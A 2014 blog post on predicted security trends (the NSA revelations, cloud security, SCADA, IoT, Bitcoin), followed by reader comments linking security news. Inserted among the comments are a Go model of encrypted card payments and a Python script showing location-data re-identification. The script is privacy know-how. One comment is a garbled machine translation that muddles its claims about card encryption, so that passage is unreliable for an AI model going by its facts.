Security trends for 2014

2014 will be a year of cybersecurity after the NSA revelations of 2013. The headline news was that the NSA has surreptitiously “burrowed its way into nearly all the security architecture” sold by the world’s largest computer networking companies. Many people were shocked by how much of the Internet the NSA monitored and hacked. There will be further NSA aftershocks as new material comes out and different parties react to it (and news sources write about it). U.S. cloud services have been called into question for good reason. There will be a lot of NSA spying litigation. The spying issues will also fuel some hacktivism (it has already started to happen).

The article Security Professionals: Top Cyber Threat Predictions for 2014 lists the following predictions, which seem quite probable: Cybersecurity Regulatory Efforts Will Spark Greater Need for Harmonization; Service-Impacting Interruptions for Online Services Will Persist; We Will See an Increase in Cybercrime Activity Related to the World Cup; Rise of Regional Cloud Services; Dev-Ops Security Integration Fast Becoming Critical; Cybercrime that Leverages Unsupported Software Will Increase; Increase in Social Engineering and Ransomware Will Impact More People.

Ubiquitous mobile computing is all around us, which will lead to increased risks and concerns about social network privacy. Social networks have quickly become the key organizing principle of Internet communication and collaboration. Android anti-virus apps CAN’T kill nasties on sight like normal AV.

2013 was a year of big hacks, with many cases where information on millions or tens of millions of users was stolen from companies. It is likely that we will see much more of the same in 2014: the way people use passwords and the way on-line services are built have not changed much in one year.


Gartner predicts that through 2014, improved JavaScript performance will begin to push HTML5 and the browser as a mainstream enterprise application development environment. I expect HTML5-related security issues to increase as the technology is used more in 2014.

Over 50% of net traffic to web sites is made by bots! The article More Than Half of Internet Traffic Is Just Bots says that security and cloud service provider Incapsula analyzed traffic and found that more than 60 percent of Internet traffic is computer generated, compared to less than 40 percent driven by human clicks. 31% of bots are still malicious. SEO link building has always been a major motivation for automated link spamming, but it is decreasing because Google was able to discourage it. There is more advanced hacking and automated vulnerability searching.

DDoS attacks are evolving from volumetric Layer 3-4 attacks to much more sophisticated and dangerous Layer 7 multi-vector threats.

There will still be many SCADA security issues in 2014. Even though traditional SCADA vulnerabilities have become easier to find, the increased connectivity brought by IoT will cause new issues. And there will still be very many control systems openly accessible from the Internet to practically anybody who knows how to look for them. A large number of SCADA systems were found open on the Internet at the beginning of 2013, and the numbers did not drop considerably during the year. I expect that very many of those systems will still be too open at the end of 2014.

The Internet is expanding into enterprise assets and consumer items such as cars and televisions. The Internet of Things (IoT) will evolve into the Web of Things, increasing the coordination between things in the real world and their counterparts on the Web. There will be many security issues to solve, and as these systems become more widely used, more security issues will be found in them.

Cloud security will be talked about. Hopefully there will be some clean-up of the terminology in that area, because cloud security, like the term cloud computing, can mean a lot of things. Cloud security could mean how secure your cloud provider is; a service running in the cloud that filters what comes through it (for example e-mails or web traffic); a product protecting some service running in the cloud; or a traditional anti-virus service that connects to the cloud to improve its operation (for example real-time updates, or verifying unknown programs against data in the cloud). Research firm Gartner forecasts that cloud security sales will increase dramatically in the next few years, from $2.1 billion over the past year to $3.1 billion in 2015.

Marketers try to put the term “cloud” into security product brochures as much as they can. The cloud has made traditional information security sound old-fashioned, because companies are under pressure to move services to the cloud. Also, mobile devices and dispersed users set new standards for information security. OpenDNS’s CTO Dan Hubbard says that “Because the data and equipment run in the cloud, the cloud is the best way to protect the users.” The Snowden effect will also put PRIVATE cloud talk on the table this year for security reasons, because U.S. cloud services have been called into question for good reason.

In Finland a new Cyber Security Center started in the beginning of 2014. Security articles and warnings from it will be published at kyberturvallisuuskeskus.fi.

Late addition: Crypto-currencies like Bitcoin are on the rise, and early adopters already use them actively. Those crypto-currencies have many security-related issues. Their values vary quite a lot, and the value easily drops considerably once they become so widely used that governments try to limit their use. Bitcoin is increasingly used as a ransomware payment method. Quite a lot of bitcoins have been stolen lately (and I expect that to increase as usage increases), from users, from on-line wallets and from exchanges. When more money is involved, more bad guys try to get some of it. Sometimes bad guys do not try to steal your money but use resources you pay for (your own PC, your server capacity, etc.) to generate money for themselves without your knowledge. If you plan to use crypto-currencies, be careful to understand what you are doing with them: there is a real possibility that you lose your money, and there is no way lost money can be recovered.

3,382 Comments

  1. Tomi Engdahl says:

    Comcast Wi-Fi serving self-promotional ads via JavaScript injection
    The practice raises security, net neutrality issues as FCC mulls Internet reforms.
    http://arstechnica.com/tech-policy/2014/09/why-comcasts-javascript-ad-injections-threaten-security-net-neutrality/

    Comcast has begun serving Comcast ads to devices connected to one of its 3.5 million publicly accessible Wi-Fi hotspots across the US. Comcast’s decision to inject data into websites raises security concerns and arguably cuts to the core of the ongoing net neutrality debate.

    The Comcast advertising campaign came to Ars’ attention after Ryan Singel, the co-founder of startup Contextly, was reading Mediagazer at a café in the North Beach neighborhood of San Francisco on Labor Day.

    A small red advertisement saying “XFINITY WiFi Peppy” scooted across the bottom of the Mediagazer page and disappeared into the ether. It happened a few times, he said. Singel took screen shots of the advertisement loading and as it appeared on his screen. He captured some code, too.

    “When a user requests to view a page, Comcast injects its JavaScript into the packets being returned by the real server,” Singel said during an instant-message chat.

    Reply
  2. Tomi Engdahl says:

    Facebook, the security company
    CSO Joe Sullivan talks about PrivateCore and Facebook’s homegrown security clout.
    http://arstechnica.com/security/2014/08/facebook-the-security-company/

    A VM in a vCage

    The technology PrivateCore is developing, vCage, is a virtual “cage” in the telecom industry’s usage of the word. It is software that is intended to continuously assure that the servers it protects have not had their software tampered with or been exploited by malware. It also prevents physical access to the data running on the server, just as a locked cage in a colocation facility would.

    The software integrates with OpenStack private cloud infrastructure to continuously monitor virtual machines, encrypt what’s stored in memory, and provide additional layers of security to reduce the probability of an outside attacker gaining access to virtual servers through malware or exploits of their Web servers and operating systems. If the “attestation” system detects a change that would indicate that a server has been exploited, it shuts it down and re-provisions another server elsewhere. Sullivan explained that the technology is seen as key to Facebook’s strategy for Internet.org because it will allow the company to put servers in places outside the highly secure (and expensive) data centers it operates in developed countries.

    “We’re trying to get a billion more people on the Internet,” he said. “So we have to have servers closer to where they are.”

    By purchasing PrivateCore, Facebook is essentially taking vCage off the market. The software “is not going to be sold,” Sullivan said. “They had a couple of public customers and a couple of private ones. But they took the opportunity to get to work with us because it will develop their technology faster.”

    Sullivan said the software would not be for sale for the foreseeable future. “The short-term goal is to get it working in one or two test-beds,“

    It’s been 18 months since Facebook was hit by a Java zero-day that compromised a developer’s laptop. Since then, Facebook has done a lot to reduce the potential for attacks and is using the same anomaly detection technology the company developed to watch for fraudulent Facebook user logins to spot problems within its own network and facilities.

    The Java zero-day, he said, “drove home that it’s impossible to secure an employee’s computer 100 percent.” To minimize what an attacker can get to, Facebook has moved virtually everything that employees work with into its own cloud—reducing the amount of sensitive data that resides on individual employees’ computers as much as possible.

    Reply
  3. Tomi Engdahl says:

    iPwned: How easy is it to mine Apple services, devices for data?
    High-end tools, simple hacks can still make iPhone data less private than we’d like.
    http://arstechnica.com/features/2014/09/ipwned-mining-iphones-icloud-for-personal-data-is-terrifying-simple/

    Reply
  4. Tomi Engdahl says:

    New website aims to publicly shame apps with lax security (UPDATED)
    Appropriately named HTTP Shaming IDs apps and Web services operating without
    http://arstechnica.com/security/2014/08/new-website-aims-to-shame-apps-with-lax-security/

    The amount of personal data traveling to and from the Internet has exploded, yet many applications and services continue to put user information at risk by not encrypting data sent over wireless networks. Software engineer Tony Webster has a classic solution—shame.

    Webster decided to see if a little public humiliation could convince companies to better secure their customers’ information. On Saturday, the consultant created a website, HTTP Shaming, and began posting cases of insecure communications, calling out businesses that send their customers’ personal information to the Internet without encrypting it first.

    So far, TripIt and 18 other applications and services have made the shaming list, many submitted by other people fed up with the security missteps of companies, Webster says.

    “I’ve kind of been overwhelmed in a sad but also in a good way with the number of submissions,” he says. “Some of them are fairly benign, but I’ve gotten some that are quite concerning to me, especially those that relate to financial details.”

    Webster will not publish information on the more critical cases, opting instead to reach out first to the vendors, he says.

    The lax security of mobile applications and Web services is nothing new. In July, application-management firm Appthority noted that about four out of every five mobile apps did something that put the user’s data at risk, including tracking location, collecting data on the user, and sending information to social networks or advertising affiliates. In January, a researcher at security firm ioActive found that 36 out of 40 banking applications had some unencrypted links.

    Worse, many companies do not use the secure version of the Web protocol, known as HTTPS, to secure their data. Out of 2,100 mobile applications from 600 companies, 18 percent did not encrypt data communications, according to an HP research published in December 2013.

    Those numbers are concerning, Webster says.

    “It seems ridiculous to me that in 2014 we are still sending unencrypted data over the air,” he says. “And there is no reason, in my mind, why all websites and mobile apps should not be using HTTPS.”

    Reply
  5. Tomi Engdahl says:

    Putin To Discuss Plans For Disconnecting Russia From the Internet
    http://yro.slashdot.org/story/14/09/19/1752208/putin-to-discuss-plans-for-disconnecting-russia-from-the-internet

    According to various reports, the officials will make a number of decisions about regulating the use of the Internet in Russia. This includes the ability to cut off the Russian Internet, known as Runet, from the outside world, in case of emergency.

    Reply
  6. Tomi Engdahl says:

    Your iOS 8 Data is Not Beyond Law Enforcement’s Reach… Yet.
    http://www.zdziarski.com/blog/?p=3875

    In a recent announcement, Apple stated that they no longer unlock iOS (8) devices for law enforcement.

    This is a significantly pro-privacy (and courageous) posture Apple is taking with their devices, and while about seven years late, is more than welcome. In fact, I am very impressed with Apple’s latest efforts to beef up security all around, including iOS 8 and iCloud’s new 2FA. I believe Tim Cook to be genuine in his commitment to user privacy

    In a recent blog post, I outlined a number of measures Apple took with iOS 8 to prevent many forensic artifacts from being dumped off of the device by existing commercial forensics tools. These services had completely bypassed the user’s backup encryption password, affording the consumer virtually no protection from the many law enforcement forensics tools that took advantage of these vulnerabilities. Apple closed off many of these services in iOS 8. This was a great start to better securing iOS 8, but not everything has been completely protected.

    In addition to what’s been fixed, I also outlined some things that haven’t yet been.

    What’s left are services that iTunes (and Xcode) talk to in order to exchange information with third party applications, or access your media folder.

    This, unfortunately, also opens up the capability for law enforcement to also use this mechanism to dump:

    Your camera reel, videos, and recordings
    Podcasts, Books, and other iTunes media
    All third party application data

    Existing commercial forensics tools can still acquire these artifacts from your device, even running iOS 8. I

    Reply
  7. Tomi Engdahl says:

    Apple And Google Will Force A Legal Battle Over The Privacy Of Your Passcode
    http://www.forbes.com/sites/kashmirhill/2014/09/19/apple-and-google-privacy-of-your-passcode/

    Apple wants the world to know that it’s really, really serious about privacy. Accompanying the launch of the iPhone 6 and iOS 8

    Apple is getting serious about privacy because it has to. It wants the iPhone to become the only thing you need beyond oxygen. The iPhone is not just for communication and web browsing anymore. It wants to track your health (with HealthKit), be your wallet (with Apple Pay), and control the devices in your home (with HomeKit). Depending on how personalized the iPhone 6′s vibration capabilities get, it could be your iSignificantOther. This is all set against the backdrop of concern about tech companies’ guardianship of our personal information amid the Snowden leaks.

    So now, if law enforcement wants into your phone, they’ll need to get you to enter your passcode. One Apple competitor felt the heat. Google-owned Android quickly issued an “us, too!” announcement, saying that its next operating system will also encrypt data on smartphones by default for those using a passcode. Privacy advocates are thrilled.

    But former federal prosecutor and legal expert Orin Kerr was not thrilled. He says that if the po-po have a warrant, they should be able to get into a phone, and that Apple is making it harder for them to conduct lawful searches. People encrypting the content of their devices is not common practice now, but moving forward, it could become widespread, and law enforcement will have to force people to hand over or enter their passcodes in order to get evidence from those devices. That’s where the legal showdown will happen.

    “If the government obtains a subpoena ordering the person to enter in the passcode, and the person refuses or falsely claims not to know the passcode, a person can be held in contempt for failure to comply,” writes Kerr.

    Kerr thinks the Fifth Amendment shouldn’t protect people against decrypting evidence that will be used against them

    So expect legal fireworks ahead….
    Or not. It may be that the passcode doesn’t wind up protecting people as much as you might

    Reply
  8. Tomi Engdahl says:

    Bitcoin tanks, is Alibaba to blame?
    http://www.cnbc.com/id/102016503

    The price of bitcoin has plummeted in the past few days, and some are blaming the Alibaba IPO for the virtual currency’s fall.

    Touching as low as $381.17 earlier Friday, bitcoin is trading at a far cry from its position around $513 less than a month ago or nearly $650 in July.

    Reply
  9. Tomi Engdahl says:

    There’s no escape!
    The pocket-sized spy drone with a 360 degree camera that can fly through windows and navigate tunnels

    Tiny hexacopter measures about seven inches
    Has been backed by US Air Force who plan to use it to look for IEDs
    Carries a panoramic camera that provides 360-degree view from the drone.

    Read more: http://www.dailymail.co.uk/sciencetech/article-2761257/There-s-no-escape-The-pocket-sized-drone-360-degree-fly-windows-tunnels.html#ixzz3DsPUuKuQ

    Reply
  10. Tomi Engdahl says:

    The Dark Web Gets Darker With Rise of the ‘Evolution’ Drug Market
    http://www.wired.com/2014/09/dark-web-evolution/

    In the digital drug trade as in the physical one, taking out one kingpin only makes room for another ready to satisfy the market’s endless demand. In the case of the FBI’s takedown of the Silk Road, the latest of the up-and-coming drug kingpins is far more evolved than its predecessor—and far less principled.

    Since it launched early this year, the anonymous black market bazaar Evolution has grown dramatically, nearly tripling its sales listings in just the last five months. It now offers more than 15,000 mostly illegal products ranging from weapons to weed, cocaine, and heroin. That’s thousands more than the Silk Road ever hosted. And Evolution’s popularity has been driven not only by a more secure and professional operation than its competitors, but also by a more amoral approach to the cryptomarket than the strict libertarian ethos the Silk Road preached. Case in point: About 10 percent of Evolution’s products are stolen credit card numbers and credentials for hacked online accounts.

    That development represents an unsavory departure from the Silk Road’s rule that only “victimless” contraband could be sold through its anonymous black market—a sign that the traditional cybercriminal underground sees an opportunity to merge its identity theft business with the widening online trade in narcotics.

    Reply
  11. Tomi Engdahl says:

    Ex-Employees Say Home Depot Left Data Vulnerable
    http://www.nytimes.com/2014/09/20/business/ex-employees-say-home-depot-left-data-vulnerable.html?_r=0

    The risks were clear to computer experts inside Home Depot: The home improvement chain, they warned for years, might be easy prey for hackers.

    But despite alarms as far back as 2008, Home Depot was slow to raise its defenses, according to former employees. On Thursday, the company confirmed what many had feared: The biggest data breach in retailing history had compromised 56 million of its customers’ credit cards. The data has popped up on black markets and, by one estimate, could be used to make $3 billion in illegal purchases.

    Yet long before the attack came to light this month, Home Depot’s handling of its computer security was a record of missteps, the former employees said.

    In recent years, Home Depot relied on outdated software to protect its network and scanned systems that handled customer information irregularly, those people said. Some members of its security team left as managers dismissed their concerns. Others wondered how Home Depot met industry standards for protecting customer data. One went so far as to warn friends to use cash, rather than credit cards, at the company’s stores.

    And yet, two former employees said, while Home Depot data centers in Austin, Tex., and Atlanta were scanned, more than a dozen systems handling customer information were not assessed and were off limits to much of the security staff.

    “Scanning is the easiest part of compliance,” said Avivah Litan, a cybersecurity analyst at Gartner, a research firm. “There are a lot of services that do this. They hardly cost any money. And they can be run cheaply from the cloud.”

    Reply
  12. Tomi Engdahl says:

    Samsung drops Knox prices and introduces Knox user portal
    Employees using ActiveSync can install My Knox without an IT admin
    http://www.computerworld.com/article/2686154/samsung-drops-knox-prices-and-introduces-knox-user-portal.html

    Samsung on Thursday announced price reductions and updates for its Knox security and management software for IT shops and a free My Knox service that is directly available to professionals using ActiveSync.

    My Knox can be installed on a user’s Galaxy S5 or Galaxy Note 4 smartphone without an IT administrator’s involvement to set up a My Knox User Portal to remotely find, wipe and lock a device, according to a Samsung blog.

    With My Knox, professionals can synchronize emails, calendar events and contacts between desktop computers and mobile devices, Samsung said. It creates a virtual Android partition within the mobile device that has its own home screen, launcher, apps and widget.

    “If you are looking for a free security solution that ensures your privacy while providing the simplicity of having a secure workspace for email and apps that is managed by you, look no further than My Knox,” Samsung’s blog says.

    “Knox Premium will be attractive to businesses because of its low cost and it will address concerns that Knox is expensive and not affordable,”

    Knox Express will also have Knox EMM, and will have an online portal for IT admins with support for Samsung and other Android and iOS devices, Samsung said.

    Take control of your mobile device for work with Samsung My KNOX
    https://www.samsungknox.com/en/blog/take-control-your-mobile-device-work-samsung-my-knox

    Calling all employees, we’ve got something for you! We’re introducing our newest option for business users with essential mobile device security needs: My KNOX. If you’re concerned with maintaining your privacy while securely keeping company data on your device, My KNOX has got you covered. My KNOX is designed for professionals in enterprises with Microsoft Exchange ActiveSync (EAS) accounts, so that you can synchronize emails, calendar events, and contacts between desktop computers and mobile devices. My KNOX is simple to set up, secure, and free!

    Reply
  13. Tomi Engdahl says:

    The chip alone does not protect against credit card hacks

    When the United States to pay by credit card, always gets nervous, cyber criminals hijack card information immediately to trade the system. Why Finland does not become a public card data theft?

    “We have smart cards, in the States does.” This in Finland it is customary to say, when the news that the United States, criminals have again been hijacked millions of payment cards with information on the systems.

    Source of the United States: There debit card information has reached the large numbers of criminals. Attacks, cybercriminals are ujuttaneet malicious transactions in payment systems. Target and Home Depot, the systems have been found Blackpose malware variants.

    Could something similar happen sometime in Finland?

    “In many cases in Finland the reaction is that this could not happen here, because we are used to chip cards. I think it is still possible that in Finland we will start with our sales terminals,” Kimmo Vesajoki of security company Trend Micro Finland and Baltics says to Tivi.

    “EMV chip cards or debit cards will not be able to prevent the payment terminals occurring in the so-called ram-mopping-based attacks,” Trend Micro’s report says.

    The United States and many other countries in payment systems is a serious weakness: Card Data processing ram memory merchant’s computer or on a server.

    At that moment, when the user enters a debit card trade card reader, the data is transmitted to the merchant’s own cashier or merchant’s server to your computer. Central memory card data are vanishingly small moment in an unencrypted format before they are encrypted. If a terminal is malware, it will automatically detect when the main memory should be specifically credit card information and collect them in a lightning recovery.

    “The PCI DSS security standard for card payments requires that card data must be encrypted if it is saved or transmitted over the network. Therefore, the data is collected from main memory before it is encrypted.”

    Trend Micro said already the end of August before the Home Depot-news that it has detected a Blackpose-new versions of the malware. They pretend to McAfee’s security agents of the program and hit the main memory.

    Card readers in the United States are almost everywhere in the magnetic lines of the readers. Would the chip card and smart card reader ram attack the use of?

    “The chip card has no additional security if the theft takes place in the main memory. The chip card primarily to prevent physical copy, but not the card information in the online store, ”

    “The chip card technology alone does not preclude the central memory of attacks, which is accentuated by the news of recent break-ins. Protection needed for other methods,” says Electronic payment International Organization for Standardization PCI’s director Bob Russo.

    Ram attack is successful in spite of the chip, if the data are exported to the merchant’s computer in the same way as magnetic stripe reading.

    The chip can be read from the card holder’s name, card number and expiration date. Just these data without cvv2 code is sufficient in some online shopping, so they are valid for criminals. Information is also collected successfully. It hints at the fact that the UK has moved to chip cards, but according to Trend Micro will become more common card payment fraud involving the use of the card data without a physical card, ie online.

    Card payment company Nets’ risk management expert Pekka Vermasvuo, however, says that memory-reading malware in Finland does not get access to card information. The reason for this is that here the card payment transaction is processed as a whole safely in the chip payment terminal, and card information transmitted unencrypted to the cash register workstation.

    “We estimate that in Finland all the available modern chip card terminal systems operate according to this principle and are not susceptible to such attacks,”

    “Among them, the card information is never go to the dealer in your system and data running on the merchant’s online all unencrypted. In the States a card reader transmits the information to Checkout that is running Windows XP or Linux workstation, while in Finland the data do not go to the workstation,”

    In segregated system, the card reader is not just a dumb terminal, such as the United States. The chip payment terminal is the small computer, which encrypts card data the same way own their shells within. It’s talking directly to the card issuer’s systems. Cashier must only provide knowledge of the total price to be paid.

    Encryption solution uses the term end to end encryption, p2pe.

    Transaction recipient to decrypt, verify card authenticity, validity and accuracy of the pin-code and makes charge reservation. Retail System does not get any sensitive any card data, only the acknowledgment made the payment and the same identity that appear on the customer’s receipt.

    “Implementation is a common practice in Finland, and it is used by, for example, the largest grocery chains. It can be estimated that almost all of Finland’s card payments are transmitted to this day from end to end encrypted,”

    “Even the trader himself is not able to break into the card information, or listen to the traffic,”

    “The States the payment process is a POS system, when we have it is differentiated and it only transmits an acknowledgment to the POS system. Risks are of course not zero, but they are clearly lower. In the United States have woken up to the payment security very late, but I know that the situation is going to change quite a lot, ”

    Finland is still weak systems for small businesses (cafes, restaurants and shops), which have not been updated for some years. They card information may be further addressed, and to collect locally. A particularly clear warning sign is the fact that there is only a magnetic stripe reader.

    The representative of Nets, the Visa and MasterCard payment card company in Finland, tells Tivi that even small merchants do not have to worry. Chip card environments have broadly moved to a model where the card information goes only to the card transaction recipient.

    “In addition, p2pe implementation is also widely used for small traders. It represents a significant part of the New installations both large and small retailers, ”

    The Nordic countries, from end to end encryption and separate systems are widely used. The situation in other parts of the world, Niki Klaus does not know exactly, but in any case, the situation is considerably more diverse.

    Even the chip card does not give certainty. It only guarantees the payment entity. Many of the world sold the chip card readers do not support end to end encryption.

    If you travel, credit card transactions worth a go through carefully and regularly. Especially for small purchases should be checked because of this reason: Criminals do with stolen credit card information initially only small less than $ 10 test purchases to check whether they can be utilized. If the transaction is successful, it will raise the black market card information to a higher price point….

    Source: http://summa.talentum.fi/article/tv/uutiset/91615

    Reply
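The segregated, end-to-end encrypted (P2PE) flow this comment describes, next to the magstripe-style flow that leaves the card data in POS memory, as an added Go example that is not part of the original post or of any vendor's product. The AES-GCM construction, the demo key, the binding of the cashier's amount as associated data and the test PAN are this example's own assumptions, chosen to show why the POS workstation never holds anything a RAM scraper could use.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"strconv"
	"strings"
)

// Demo-only key shared by the chip terminal and the card transaction
// recipient (acquirer); a real P2PE terminal keeps it in secure hardware.
var acquirerKey = sha256.Sum256([]byte("constructed demo key, not a real terminal key"))

// CardData is what the chip reveals to the terminal: name, PAN and expiry.
type CardData struct{ Name, PAN, Expiry string }

// Receipt is all the retail system ever sees: an acknowledgment plus the
// masked identity that is printed on the customer's copy.
type Receipt struct {
	Approved  bool
	MaskedPAN string
}

// DumbTerminalRead models the magstripe-style flow: the reader hands the POS
// workstation the raw card data, which then sits unencrypted in its memory.
func DumbTerminalRead(c CardData) string {
	return c.Name + "|" + c.PAN + "|" + c.Expiry
}

func newGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher(acquirerKey[:])
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal models the segregated chip terminal: it encrypts the card data itself
// (AES-GCM) and returns an opaque hex blob for the POS to forward. The amount
// the cashier supplied is bound as associated data (this demo's own choice),
// so the POS cannot alter it afterwards.
func (c CardData) Seal(amountCents int64) (string, error) {
	gcm, err := newGCM()
	if err != nil {
		return "", err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return "", err
	}
	plaintext := []byte(c.Name + "|" + c.PAN + "|" + c.Expiry)
	aad := []byte(strconv.FormatInt(amountCents, 10))
	return hex.EncodeToString(gcm.Seal(nonce, nonce, plaintext, aad)), nil
}

// luhnValid is the standard mod-10 check on a PAN.
func luhnValid(pan string) bool {
	sum, double := 0, false
	for i := len(pan) - 1; i >= 0; i-- {
		d := int(pan[i] - '0')
		if d < 0 || d > 9 {
			return false
		}
		if double {
			d *= 2
			if d > 9 {
				d -= 9
			}
		}
		sum += d
		double = !double
	}
	return len(pan) > 0 && sum%10 == 0
}

// AcquirerAuthorize is the card transaction recipient: it decrypts the blob,
// checks the PAN and returns only a receipt. A failed GCM open (corrupted blob
// or an amount that differs from the one the terminal bound) is an error, not
// a decline, because the message was altered in transit.
func AcquirerAuthorize(blob string, amountCents int64) (Receipt, error) {
	gcm, err := newGCM()
	if err != nil {
		return Receipt{}, err
	}
	raw, err := hex.DecodeString(blob)
	if err != nil || len(raw) < gcm.NonceSize() {
		return Receipt{}, errors.New("malformed blob")
	}
	aad := []byte(strconv.FormatInt(amountCents, 10))
	plain, err := gcm.Open(nil, raw[:gcm.NonceSize()], raw[gcm.NonceSize():], aad)
	if err != nil {
		return Receipt{}, errors.New("integrity check failed: blob or amount was altered")
	}
	fields := strings.Split(string(plain), "|")
	if len(fields) != 3 || !luhnValid(fields[1]) {
		return Receipt{Approved: false}, nil
	}
	pan := fields[1]
	return Receipt{Approved: true, MaskedPAN: "**** **** **** " + pan[len(pan)-4:]}, nil
}
```

The POS in this model only ever handles the hex blob and the amount, so a memory dump of the workstation yields ciphertext, and a cashier-side change to the amount makes the acquirer reject the transaction outright.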
  14. Tomi Engdahl says:

    Special pleading against mass surveillance won’t help anyone
    Protecting journalists alone won’t protect their sources
    http://www.theregister.co.uk/2014/09/21/ripa_surveillance_special_pleading_for_journalists_pointless/

    This is shameful. We Britons once prided ourselves on being a free, tolerant and democratic society. Yet without the freedom to send and receive information – yes, even info which threatens public sector employees’ pensions – we stand in grave danger of having our freedoms and best interests overridden by a self-serving elite, safely insulated from the public thanks to focus groups and chauffeur-driven cars, fuelled by taxpayer-funded expense accounts.

    Reply
  15. Tomi Engdahl says:

    ‘Kim Kardashian snaps naked selfies with a BLACKBERRY’. *Twitterati gasps*
    More alleged private, nude celeb pics appear online
    http://www.theregister.co.uk/2014/09/21/kim_kardashian_naked_selfies_allegedly_leaked_online/

    A new round of what appear to be private, naked photos of female celebrities including US television reality star Kim Kardashian have apparently been leaked online.

    The latest stash of pics, which seemed to include two naked selfies taken by Kardashian with a Blackberry handset, were easily accessible on Twitter late on Saturday night.

    - are real or fake

    So what of Kardashian’s Blackberry, then? Some have suggested that the alleged naked selfies could be a few years old and that the photos may since have been uploaded to a cloud service.

    Reply
  16. Tomi Engdahl says:

    Vilified Bitcoin Tycoon After Losing $500 Million: My Life Is at Risk
    http://www.thedailybeast.com/articles/2014/09/17/mt-gox-s-karpeles-on-losing-a-half-billion-bucks-in-bitcoins.html

    In the first interview with Mt. Gox’s Mark Karpeles since Japanese police launched an investigation into his bankrupt exchange, he says he’s just a regular geek—and that he’s in danger.

    TOKYO, Japan — What was once the world’s largest bitcoin exchange, Mt. Gox, filed for bankruptcy protection in February this year after disclosing that a half-billion dollars worth of virtual currency had disappeared into the blue, allegedly hacked.

    The bitcoin community and press have vilified Mark Karpeles, the CEO of Mt. Gox, as a clown and a con man. The Japanese tabloid magazines have portrayed him as a “beast” hiding in his “dungeon” in Tokyo’s Meguro City.

    But who is he really?

    A source close to the police investigation says the case is being looked at as one in which “Mt. Gox is the victim of a crime, rather than perpetrator of a crime.”

    Reply
  17. Tomi Engdahl says:

    Taking the No Out of Innovation
    http://mds.ricoh.com/knowledge-center/blog/taking-the-no-out-of-innovation

    “The solution to mitigating the risk is not to stop sharing and collaboration, which is essential to a productive workplace. Rather it is putting solutions in place that will keep these documents secure without requiring draconian end-user security measures that will stifle productivity.”

    Sounds great, but the question is how?

    But this does require IT to step out of its traditional role of support and to be proactive about initiating that dialog, to reach out to Line of Business innovators. It may feel counter-intuitive, but success requires IT security to encourage reorganizing processes around enabling innovation and creating business value.

    It is true many enterprises already include IT security as part of the teams that review current document and information processes. But I am advocating that IT security should collaborate with innovative domain experts or departmental managers as early as possible.

    This subtle change shifts IT security’s focus, and importantly, perception by others, from gate-keeping to helping teams predict risks, estimating risk-reduction costs, and jointly finding productive and secure solutions.

    Success does take time. And as I stated above, this does require new skills on the part of IT security. For example, the ability to communicate with non-security practitioners; and a better understanding of the business drivers and the way others think in different functional areas

    Reply
  18. Tomi Engdahl says:

    Your location info is too revealing: data boffins
    Anonymity by a thousand cuts
    http://www.theregister.co.uk/2014/09/22/your_location_info_is_too_revealing_data_boffins/

    A group of researchers partly supported by SAP has taken a look at one of the big problems with so-called “anonymised” data: the way spatial correlations in mobile data can be used to re-identify individuals in large data sets.

    Location data is the big problem, the Singapore-led group says: even if the resolution of a phone’s GPS records is reduced in a stored dataset, following a user’s track (trajectory in the paper) for long enough will easily identify that user.

    “Removing identifiers from location information, or reducing the granularity of the location or time, does not prevent disclosure of personally identifiable information,” the paper states. “Individuals are highly re-identifiable with only a few spatio-temporal points”.

    Just how revealing location trajectories are is revealed in their analysis of 56 million records: “with two random points, more than 60 per cent of the trajectories are unique”, they write.

    Reply
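The re-identification check the researchers describe, as an added example that is not code from the article or the paper: trajectories are stripped of identifiers and coarsened in space and time, then a few random points from one record are matched against the whole dataset. The commuter trajectories, grid size and time bucket are constructed for this demonstration.

```python
"""Re-identifying users from a few coarse spatio-temporal points.

Added example, not from the article or the paper it reports on: it models the
check the researchers describe, taking a handful of points from one user's
record and counting how many trajectories in the dataset contain them, after
the data has been 'anonymised' by removing identifiers and reducing the
granularity of location and time. The dataset, grid size and time bucket are
constructed for the demonstration.
"""
import random

HOUR = 3600


def coarsen(trajectory, cell_deg=0.01, bucket_s=HOUR):
    """Snap each (unix_time, lat, lon) point to a grid cell and a time bucket.

    This is the granularity reduction the paper says does not protect anyone;
    the trajectory becomes an unordered set of coarse points with no user id.
    """
    return {(t // bucket_s, round(lat / cell_deg), round(lon / cell_deg))
            for t, lat, lon in trajectory}


def matching_trajectories(coarse_trajectories, points):
    """Indices of the trajectories that contain every one of the given points."""
    points = set(points)
    return [i for i, coarse in enumerate(coarse_trajectories) if points <= coarse]


def uniqueness_rate(trajectories, k, cell_deg=0.01, bucket_s=HOUR, seed=0):
    """Fraction of users pinned down by k random points from their own record.

    For each trajectory, sample k of its coarse points (the paper's 'random
    points') and ask how many trajectories in the dataset contain all of them.
    A match count of one means the user is re-identifiable from those k points.
    """
    rng = random.Random(seed)
    coarse = [coarsen(t, cell_deg, bucket_s) for t in trajectories]
    unique = 0
    for record in coarse:
        sample = rng.sample(sorted(record), min(k, len(record)))
        if len(matching_trajectories(coarse, sample)) == 1:
            unique += 1
    return unique / len(coarse)


# Constructed sample: commuters who share an office and a lunch spot but live
# in different places. Coordinates are arbitrary (roughly central Helsinki).
OFFICE = (60.170, 24.941)
CAFE = (60.168, 24.945)
HOMES = [(60.210, 24.880), (60.160, 25.000), (60.190, 24.960), (60.230, 24.990)]
SAMPLE_TRAJECTORIES = [
    [(7 * HOUR,) + home, (9 * HOUR,) + OFFICE, (12 * HOUR,) + CAFE, (18 * HOUR,) + home]
    for home in HOMES
]


if __name__ == "__main__":
    # The shared office and cafe cells do not identify anyone; the moment a
    # sampled point falls on a home cell, the user is unique in the dataset.
    for k in (1, 2, 3, 4):
        rate = uniqueness_rate(SAMPLE_TRAJECTORIES, k)
        print(f"k={k} random points: {rate:.2f} of trajectories are unique")
```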
  19. Tomi Engdahl says:

    CloudFlare ditches private SSL keys for better security
    ‘Sorry, spooks, we can’t decrypt this for you’
    http://www.theregister.co.uk/2014/09/22/cloudflare_ditches_keys_for_better_security/

    CloudFlare has announced the outcome of what it says is two years’ work – switching on Keyless SSL – which lets customers encrypt their web traffic via the company’s services without having to hand over their private SSL keys.

